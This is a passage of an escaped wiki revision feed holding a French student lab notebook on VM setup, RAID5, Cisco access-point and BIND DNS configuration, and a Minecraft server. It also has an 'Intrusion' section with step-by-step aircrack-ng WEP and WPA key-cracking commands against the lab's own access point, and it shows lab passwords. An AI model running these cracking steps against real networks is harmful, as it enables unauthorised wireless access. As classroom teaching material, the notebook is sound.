En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60259</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60259"/>
				<updated>2022-11-28T23:24:52Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Réseau privé VLAN 20 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
Réseau privé VLAN 20&lt;br /&gt;
&lt;br /&gt;
Configuration Wifi EAP :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 On considère la commande ci-dessous de la configuration précédente :&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
